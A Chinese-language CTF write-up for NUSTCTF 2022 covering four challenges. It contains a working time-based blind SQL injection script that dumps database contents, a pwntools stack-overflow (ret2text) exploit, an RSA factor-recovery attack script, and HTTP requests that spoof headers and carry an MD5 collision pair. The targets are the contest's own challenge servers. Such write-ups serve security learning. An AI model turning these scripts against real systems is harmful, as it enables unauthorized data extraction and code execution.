# NUSTCTF(校外赛道)2022-wp

题目复现环境：
https://www.ctfer.vip/contest/62/
欢迎加QQ群，一起做题和共享解题思路： 936250507
1
2
3

[Web]EzSQL

http://47.103.60.98/
1

访问时，提供了一个“查询”按钮。点击，进入查询结果页面。

http://47.103.60.98/index.php?sort=desc

id: 2 - 姓名: Bob - 籍贯: 江苏无锡
id: 4 - 姓名: Tom - 籍贯: 江苏常州
id: 1 - 姓名: Alice - 籍贯: 江苏南京
id: 5 - 姓名: Mary - 籍贯: 江苏南京
id: 6 - 姓名: Allen - 籍贯: 江苏南京
1
2
3
4
5
6
7

发现链接末尾是desc，猜测是order by xx desc这样的查询语句。

FUZZ一下SQL关键字，过滤的关键字不多。

过滤的有：空格
1

经尝试，发现存在基于时间的SQL注入漏洞。exp脚本如下：

import requests

burp0_url = "http://47.103.60.98/index.php?sort="
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0",
                 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                 "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                 "Accept-Encoding": "gzip, deflate",
                 "Content-Type": "application/x-www-form-urlencoded",
                 }
all_print_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"

query_str = ''
for length in range(1, 40):
    print(length,end='')
    for char in all_print_str:
        # payload = "desc,if(ascii(mid(database(),{0},1))={1},sleep(1),0)#".format(length, ord(char))
        # payload = "desc,if(length((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1))=%s,sleep(3),1) --+" %l
        # payload = "desc,if(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))={1},sleep(1),0)#".format(length, ord(char))
        # payload = "desc,if(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x706f736974696f6e),{0},1))={1},sleep(1),0)#".format(length, ord(char))
        payload = "desc,if(ascii(mid((select/**/group_concat(name,position)/**/from/**/position/**/where/**/id=3),{0},1))={1},sleep(1),0)#".format(length, ord(char))
        # burp0_data = {"username": "admin", "password": payload}
        resp = requests.get(burp0_url+payload, headers=burp0_headers)
        # print('{} : {} : {}'.format(length, char, resp.elapsed.total_seconds()))//响应时间
        if resp.elapsed.total_seconds() > 1:
            query_str += char
            print(query_str)
        else:
            continue
# flag{f96cb1d47fa4022d1616b799367f078a3}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

[PWN]ezPwn

64位程序，先IDA逆向分析源代码：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[10]; // [rsp+6h] [rbp-Ah] BYREF

  setbuf(_bss_start, 0LL);
  puts("Your name plz:");
  gets(v4);
  if ( v4[0] % 233 == 233 )
    system("cat flag");
  printf("Can you hack me? %s\n", v4);
  return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12

gets存在栈溢出漏洞，可修改返回地址至 system("cat flag") 代码处，ret2text。

exp:

from pwn import *

context.log_level = 'debug'
io = remote("43.143.7.97", 28859)
sys_addr = 0x401229
pl1 = b'A'*(10+8) + p64(sys_addr)
io.sendlineafter(b"Your name plz:",pl1)
io.interactive()
1
2
3
4
5
6
7
8

[Crypto] ezRSA

chall.py

from Crypto.Util.number import getPrime, bytes_to_long
from sympy import nextprime
from secret import flag

p1 = getPrime(2048)
q1 = getPrime(600)
p2 = nextprime(p1 + getPrime(600))
q2 = getPrime(600)

e = 0x10001

N1 = p1 * p1 * q1
N2 = p2 * p2 * q2

print("N1 =", N1)
print("N2 =", N2)

flag1 = bytes_to_long(flag[:len(flag) // 2])
flag2 = bytes_to_long(flag[len(flag) // 2:])

cipher1 = pow(flag1, e, N1)
cipher2 = pow(flag2, e, N2)

print("cipher1 =", cipher1)
print("cipher2 =", cipher2)

# N1 = 3289746385054724131365721020639496300945479666755005407239362220435929471663971559131973068094267242759747682915202602265269024546168034070348080432976135403371083936361236868186476392365554734516698695915807318328547349333450125215426536032220967810893464208090339137598724593917266763998037725309967496052803477931961681761135080900299333158097292389350335121611775110493009954911832572636099153354952171029044016319029661601727739828271424563980850243898202779669776639104067478441675153857040164775196713586656673764171877161326751846236980454659960530174960321852298270258312146241360929350418220172331956030775384681767932014061291168620965347842124549316096247113770711834360498936747471888481237404034471246978342020816271785925362208839937490625070051801028223342083281773366267363149243726101075926327550718757413133631119649782144511080448476370411156544146278468602957599519708203511203435394861053372096309444985117323976240925612725880016576029876493825989064619463226166401883310383733295274652092903872304933657343307118616812213637906513530016004460475073291823916649597185291734261926576108675712303422832460766980003743958182130150811173621769221262799069912858162405156365709344847558244669016188305691537672753134766406649385330682157984720023661279153645005631349488537261911860571171672813544726579872640486753312665928030263533489558821140031095492111373847722540582741061909831250761476687
# N2 = 2292263744571677490370198515319050673022350367021940229132415885393214523108231545410288799524823682686607005535541881885794949322622162858593875970155712564868530006799557973311000615581843236548539733075504282834631939435260232339940338468890310925405870533590386398071667718507612723307978025099102004513584485422609923041107028535400446355591432930994813185411831860201820145983435091523773691560011687528125877698679841462745728326159525372061320952493949821495222248383893254880735838359120880431072244214361010867779059178282739912365087421904643477215607290679708352033106358356290644004853543174075195107627794359272018100648168661860452919746052205404895413998960327066611970768862624073581670828267510841602161728589913841163473811894218339948715205301321356774629578043062238684103507006315521103670400509643518854842374093509082331379305822049420033746124157212615698602544129110388591266923967512746018551734391176602223771675279723873630468099034521371667295520830509224068753383327420799595674898227670628881521095495898465890256628288779785408613688721508315026743250146090703141554141208186588758560579281631449476819201739513661261100456398775274335050320480934180632543242116316388750179657345282978014879818574111951053767465935985181195234991374892341383106554664200986728169474150302232887629401491764905429656980077385228539526682528035467486946883267941678859904770170914569949948781798383
# cipher1 = 758346536265430423952822486066685295768780904671958564513706915003627653309986327906604310025557676880130150973194443591153899441660221125085406078577489990064034099758898680250346992154199616929381594288918352701155172644054184374384778201304104144436102359709180739955762513436889301607686277088230852661148556440251553059814853050711377102806879036793210874472411397851504602916797481132018776755416068149801594219844674499351889997208649442043923826505239289470153001663639688739092310857881616013610569511757767780350165048282465256454770748877584119349207769812826840607665168961680724232789109312681055375411182858820698025923104994832566402422884359019460479145829812817446509615552819113705033128233093081687704471007797878802184788802106948491309583791881593217988561342681568377126606055476508381741342859362339824940846336741346126512500348868154174463810299929429409815515908136711497765026252563374327541491024303290989175383501994515761077240391195396083766760326143468930305986070405962303571534654392917816088220966950447926277802817335097304148972911332832248113849846752219065263639980629213197260594242031101803801865240157341309018859709063723920616432168289755151080828619642932516426139982777613526680161145782566883722320235485389839997229666979487071672091138823743231576011381309205283462045931376953038071401274899229258796970036565931730655471667545203734032609058125128632555918726761
# cipher2 = 2281163375114595112593683220870779643793045914138930809669934728297504812745368657964524831965320392164027435706363680996214578180045485041532876049868691323690200562004954003143194397255512951717400899604307009993030792644670830602941543918898535970779253703220162651022293286208338299826844988619345629892007235258389532666376623514170628541968337364745860334903754371727427376399211310359996960626733244649671665175464666807399652951289553389561033148215888827057495743582318390507639029065358587166019110069479019692411629179363742708597061223484237748437654542910240974030049076975739481960903748359283570086571360417832776823264202688497555419017227144724790205424467059280453940666789219388347170532415234759731375390229140544207931837445265744016932142504371200121886182154284965893665022781184321216382767703694597553489507371271887593799060901908513758134472760311502510753557029741715193386673389466599068008750012915225818076301655694045130332321314233483042503950958442501013310465239137942770667655164906193219286435485452257047415797293472629254376873962168035382262951696816840667369861437088409243033239980128747965838367176274122593955221422537124546203553941387134587884149412499272660959871746858550851448840531698152805786123875121854564754397297726121984646669253047201515221545545683432754661774694401343486893270795112334494874407955432598253951220055000392855162417030953645428808146502304

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

连分数求出q1, q2，即可进一步求出p1, p2。

from Crypto.Util.number import *
from gmpy2 import *

N1 = 3289746385054724131365721020639496300945479666755005407239362220435929471663971559131973068094267242759747682915202602265269024546168034070348080432976135403371083936361236868186476392365554734516698695915807318328547349333450125215426536032220967810893464208090339137598724593917266763998037725309967496052803477931961681761135080900299333158097292389350335121611775110493009954911832572636099153354952171029044016319029661601727739828271424563980850243898202779669776639104067478441675153857040164775196713586656673764171877161326751846236980454659960530174960321852298270258312146241360929350418220172331956030775384681767932014061291168620965347842124549316096247113770711834360498936747471888481237404034471246978342020816271785925362208839937490625070051801028223342083281773366267363149243726101075926327550718757413133631119649782144511080448476370411156544146278468602957599519708203511203435394861053372096309444985117323976240925612725880016576029876493825989064619463226166401883310383733295274652092903872304933657343307118616812213637906513530016004460475073291823916649597185291734261926576108675712303422832460766980003743958182130150811173621769221262799069912858162405156365709344847558244669016188305691537672753134766406649385330682157984720023661279153645005631349488537261911860571171672813544726579872640486753312665928030263533489558821140031095492111373847722540582741061909831250761476687
N2 = 2292263744571677490370198515319050673022350367021940229132415885393214523108231545410288799524823682686607005535541881885794949322622162858593875970155712564868530006799557973311000615581843236548539733075504282834631939435260232339940338468890310925405870533590386398071667718507612723307978025099102004513584485422609923041107028535400446355591432930994813185411831860201820145983435091523773691560011687528125877698679841462745728326159525372061320952493949821495222248383893254880735838359120880431072244214361010867779059178282739912365087421904643477215607290679708352033106358356290644004853543174075195107627794359272018100648168661860452919746052205404895413998960327066611970768862624073581670828267510841602161728589913841163473811894218339948715205301321356774629578043062238684103507006315521103670400509643518854842374093509082331379305822049420033746124157212615698602544129110388591266923967512746018551734391176602223771675279723873630468099034521371667295520830509224068753383327420799595674898227670628881521095495898465890256628288779785408613688721508315026743250146090703141554141208186588758560579281631449476819201739513661261100456398775274335050320480934180632543242116316388750179657345282978014879818574111951053767465935985181195234991374892341383106554664200986728169474150302232887629401491764905429656980077385228539526682528035467486946883267941678859904770170914569949948781798383
c1 = 758346536265430423952822486066685295768780904671958564513706915003627653309986327906604310025557676880130150973194443591153899441660221125085406078577489990064034099758898680250346992154199616929381594288918352701155172644054184374384778201304104144436102359709180739955762513436889301607686277088230852661148556440251553059814853050711377102806879036793210874472411397851504602916797481132018776755416068149801594219844674499351889997208649442043923826505239289470153001663639688739092310857881616013610569511757767780350165048282465256454770748877584119349207769812826840607665168961680724232789109312681055375411182858820698025923104994832566402422884359019460479145829812817446509615552819113705033128233093081687704471007797878802184788802106948491309583791881593217988561342681568377126606055476508381741342859362339824940846336741346126512500348868154174463810299929429409815515908136711497765026252563374327541491024303290989175383501994515761077240391195396083766760326143468930305986070405962303571534654392917816088220966950447926277802817335097304148972911332832248113849846752219065263639980629213197260594242031101803801865240157341309018859709063723920616432168289755151080828619642932516426139982777613526680161145782566883722320235485389839997229666979487071672091138823743231576011381309205283462045931376953038071401274899229258796970036565931730655471667545203734032609058125128632555918726761
c2 = 2281163375114595112593683220870779643793045914138930809669934728297504812745368657964524831965320392164027435706363680996214578180045485041532876049868691323690200562004954003143194397255512951717400899604307009993030792644670830602941543918898535970779253703220162651022293286208338299826844988619345629892007235258389532666376623514170628541968337364745860334903754371727427376399211310359996960626733244649671665175464666807399652951289553389561033148215888827057495743582318390507639029065358587166019110069479019692411629179363742708597061223484237748437654542910240974030049076975739481960903748359283570086571360417832776823264202688497555419017227144724790205424467059280453940666789219388347170532415234759731375390229140544207931837445265744016932142504371200121886182154284965893665022781184321216382767703694597553489507371271887593799060901908513758134472760311502510753557029741715193386673389466599068008750012915225818076301655694045130332321314233483042503950958442501013310465239137942770667655164906193219286435485452257047415797293472629254376873962168035382262951696816840667369861437088409243033239980128747965838367176274122593955221422537124546203553941387134587884149412499272660959871746858550851448840531698152805786123875121854564754397297726121984646669253047201515221545545683432754661774694401343486893270795112334494874407955432598253951220055000392855162417030953645428808146502304
e = 0x10001

def continuedFra(x, y):
    cF = []
    while y:
        cF += [x // y]
        x, y = y, x % y
    return cF

def Simplify(ctnf):
    numerator = 0
    denominator = 1
    for x in ctnf[::-1]:
        numerator, denominator = denominator, x * denominator + numerator
    return (numerator, denominator)
    
def getit(c):
    cf=[]
    for i in range(1,len(c)):
        cf.append(Simplify(c[:i]))
    return cf

def wienerAttack(n1, n2):
    cf=continuedFra(n1,n2)
    for (p2,p1) in getit(cf):
        if p1 == 0:
            continue
        if n1%p1==0 and p1!=1:
            return p1,p2

q1,q2 = wienerAttack(N1,N2)
print(isPrime(q1))
print(isPrime(q2))
print(q1,q2)
print(q1.bit_length())
print(q2.bit_length())
p1,f = iroot(N1//q1, 2)
p2,f = iroot(N2//q2, 2)
print(isPrime(p1))
print(isPrime(p2))
d1 = inverse(e, p1*(p1-1)*(q1-1))
d2 = inverse(e, p2*(p2-1)*(q2-1))
m1 = pow(c1, d1, N1)
m2 = pow(c2, d2, N2)
print(long_to_bytes(m1).decode(), end='')
print(long_to_bytes(m2).decode())
# flag{6575266e9fc6411275185799ec9477ee}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

[Web] ezProtocol

来检验一下你的WEB基础知识吧

这题检测HTTP协议。使用Yakit的Web Fuzzer发包：

GET / HTTP/1.1
Host: 43.143.7.97:28086


-->
You must come from 127.0.0.1
1
2
3
4
5
6

加一个XFF头：

GET / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1

-->
Have you just visited http://localhost/?
1
2
3
4
5
6

再加一个Referer:

GET / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1
Referer: http://localhost/

-->
You must use POST
1
2
3
4
5
6
7

改GET方法为POST方法：

--> Your posted username must be admin
1

再添加POST的数据：

POST / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded

username=admin

--> Your posted p1 and p2 must be different but have the same md5
1
2
3
4
5
6
7
8
9

md5强碰撞绕过。

POST / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded

username=admin&p1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&p2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
1
2
3
4
5
6
7

–>

Set-Cookie: dinner=diet%20menu

I don' want to follow diet menu anymore, I want to have a big meal
1
2
3

添加Cookie:

POST / HTTP/1.1
Host: 43.143.7.97:28086
X-Forwarded-For: 127.0.0.1
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded
Cookie: dinner=big%20meal

username=admin&p1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&p2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

-->
Oh, I'm satisfied, and this is your flag: NSSCTF{b62ea40a-37de-4437-b7d3-5da72bf44b00}
1
2
3
4
5
6
7
8
9
10
11